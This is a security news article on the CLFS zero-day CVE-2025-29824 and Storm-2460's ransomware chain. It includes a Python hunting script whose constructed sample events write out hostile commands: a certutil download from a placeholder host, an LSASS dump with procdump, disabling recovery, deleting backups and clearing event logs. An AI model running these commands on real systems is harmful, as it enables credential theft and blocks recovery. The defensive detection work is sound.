Microsoft has reported the discovery of a zero-day elevation of privilege vulnerability in the Windows Common Log File System (CLFS) that has been actively exploited by threat actors in targeted ransomware campaigns.
This vulnerability, tracked as CVE-2025-29824, was addressed in a security update released on April 8, 2025.
The exploitation activity has been attributed to Storm-2460, a threat group using the PipeMagic malware to deploy ransomware.
Technical Details of CVE-2025-29824 and Exploitation
The vulnerability resides in the CLFS kernel driver (clfs.sys) and allows an attacker who already has code execution as a standard user to escalate to SYSTEM privileges.
Storm-2460 used it as one stage of a multi-step attack chain.
While the initial access vector remains unclear, Microsoft observed the attackers using the certutil utility to download a malicious MSBuild project file from a compromised, legitimate third-party website.
That file carried an encrypted payload which, when processed by MSBuild, decrypted and launched the PipeMagic malware, previously documented in ransomware activity.
Once PipeMagic was running, the attackers launched the CLFS exploit in memory from a dllhost.exe process.
The exploit first leaked kernel addresses through the NtQuerySystemInformation API, then triggered the memory-corruption flaw in the CLFS driver and used the RtlSetAllBits API to overwrite the privilege bitmap of the exploit process's token so that every privilege was enabled.
With SYSTEM-level rights, the exploit could then run commands and inject code into other processes.
Windows 11, version 24H2 already restricts the system information classes the exploit relied on to users holding SeDebugPrivilege (in practice, administrators), so the kernel-address leak fails and this exploit is neutralized on that version even before the update is applied.
Ransomware Deployment and Post-Exploitation Behavior
After the CLFS exploit succeeded, Storm-2460 injected a payload into winlogon.exe and used the Sysinternals procdump.exe tool to dump LSASS memory and harvest credentials.
Those credentials gave the group broader access across the network and ultimately enabled the deployment of ransomware.
Files on victim systems were encrypted with random file extensions, and a ransom note named !_READ_ME_REXX2_!.txt was dropped; the domains in the note tie the activity to the RansomEXX ransomware family.
To hinder recovery, the attackers also ran commands to disable Windows recovery options and clear event logs.
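The behaviours described in the two sections above (certutil as a downloader, MSBuild launching the loader, dllhost.exe hosting the exploit, winlogon.exe injection, procdump against LSASS, recovery and event-log tampering) all surface in process-creation telemetry. The hunting logic below is an added example written for this page, not Microsoft's code or hunting queries; the events it runs over are constructed, and the specific command-line flags, the dllhost.exe /Processid heuristic and the winlogon.exe child allowlist are assumptions for illustration rather than details from the article.

```python
"""Hunt for the Storm-2460 process chain in process-creation events.

Added example, not Microsoft's code or hunting queries. Events are constructed
Sysmon-style records (pid, parent, image, cmdline); the exact flags, the
dllhost.exe /Processid heuristic and the winlogon.exe child allowlist are
assumptions for illustration.
"""
import ntpath
import re

# Constructed sample telemetry (not real logs). pids 1-7 follow the article's
# chain in order; pids 8-10 are benign controls that must not fire.
_RAW = [
    (1, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil -urlcache -split -f http://example.invalid/proj.xml C:\Users\Public\proj.xml"),
    (2, r"C:\Windows\System32\cmd.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     r"MSBuild.exe C:\Users\Public\proj.xml"),
    (3, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     r"C:\Windows\System32\dllhost.exe", "dllhost.exe"),
    (4, r"C:\Windows\System32\winlogon.exe", r"C:\Users\Public\procdump.exe",
     r"procdump.exe -accepteula -ma lsass.exe C:\Users\Public\l.dmp"),
    (5, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\bcdedit.exe",
     "bcdedit /set {default} recoveryenabled no"),
    (6, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbadmin.exe",
     "wbadmin delete catalog -quiet"),
    (7, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wevtutil.exe",
     "wevtutil cl Application"),
    (8, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\dllhost.exe",
     "dllhost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}"),
    (9, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil -verify C:\certs\corp.cer"),
    (10, r"C:\Windows\System32\winlogon.exe", r"C:\Windows\System32\userinit.exe",
     "userinit.exe"),
]
SAMPLE_EVENTS = [dict(zip(("pid", "parent", "image", "cmdline"), r)) for r in _RAW]

# Children winlogon.exe normally spawns (assumed allowlist; tune per environment).
WINLOGON_EXPECTED_CHILDREN = {"userinit.exe", "logonui.exe", "dwm.exe", "fontdrvhost.exe"}


def _base(path):
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def rule_certutil_download(e):
    """certutil used as a downloader (stage 1: fetch the MSBuild file)."""
    c = e["cmdline"].lower()
    return _base(e["image"]) == "certutil.exe" and "urlcache" in c and "http" in c


def rule_msbuild_user_project(e):
    """MSBuild building a project from a user-writable path (stage 2: loader)."""
    return (_base(e["image"]) == "msbuild.exe"
            and re.search(r"\\(users|programdata|temp)\\", e["cmdline"], re.I) is not None)


def rule_dllhost_without_processid(e):
    """dllhost.exe started without the COM surrogate /Processid:{CLSID} argument (stage 3)."""
    return _base(e["image"]) == "dllhost.exe" and "/processid:" not in e["cmdline"].lower()


def rule_winlogon_unexpected_child(e):
    """winlogon.exe spawning a child it never should (stage 4: injected payload)."""
    return (_base(e["parent"]) == "winlogon.exe"
            and _base(e["image"]) not in WINLOGON_EXPECTED_CHILDREN)


def rule_procdump_lsass(e):
    """Sysinternals procdump pointed at LSASS (stage 4: credential theft)."""
    return _base(e["image"]) == "procdump.exe" and "lsass" in e["cmdline"].lower()


def rule_recovery_inhibition(e):
    """bcdedit/wbadmin used to disable recovery (stage 5)."""
    c = " ".join(e["cmdline"].lower().split())
    name = _base(e["image"])
    return ((name == "bcdedit.exe" and "recoveryenabled no" in c)
            or (name == "wbadmin.exe" and "delete catalog" in c))


def rule_event_log_clear(e):
    """wevtutil clearing an event log (stage 5)."""
    return (_base(e["image"]) == "wevtutil.exe"
            and re.search(r"\b(cl|clear-log)\b", e["cmdline"], re.I) is not None)


RULES = {
    "certutil_download": rule_certutil_download,
    "msbuild_user_project": rule_msbuild_user_project,
    "dllhost_without_processid": rule_dllhost_without_processid,
    "winlogon_unexpected_child": rule_winlogon_unexpected_child,
    "procdump_lsass": rule_procdump_lsass,
    "recovery_inhibition": rule_recovery_inhibition,
    "event_log_clear": rule_event_log_clear,
}


def hunt(events):
    """Return (pid, rule_name) for every event that matches a rule."""
    return [(e["pid"], name) for e in events for name, fn in RULES.items() if fn(e)]


def chain_stages(findings):
    """Distinct stages seen; one stage alone is noise, several together are the chain."""
    return sorted({rule for _, rule in findings})
```

Any single rule here fires on benign activity (certutil and MSBuild both have legitimate uses, and a dllhost.exe without /Processid is merely unusual), so the signal is several distinct stages on one host within a short window, which is why chain_stages counts distinct rules rather than raw hits. Run hunt(SAMPLE_EVENTS) to see pids 1 through 7 flagged and the three benign controls pass.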
Microsoft has strongly urged organizations to apply the April 2025 security update immediately and has reiterated the importance of proactive defense measures.
According to the report, customers running Windows 11, version 24H2 are not affected by the observed exploit because of the additional mitigations in that version, even where the vulnerability is present; the update should still be applied.
Recommendations for mitigation include using Microsoft Defender's advanced features, such as turning on cloud-delivered protection, running Endpoint Detection and Response (EDR) in block mode, and enabling automated investigation and remediation.
Organizations are also encouraged to improve visibility into their network with device discovery tools and to deploy attack surface reduction rules that block common ransomware tactics.
This incident underscores the critical importance of timely patching and advanced detection strategies to defend against sophisticated ransomware campaigns leveraging zero-day vulnerabilities.
Microsoft continues to collaborate with industry partners to analyze and mitigate emerging threats.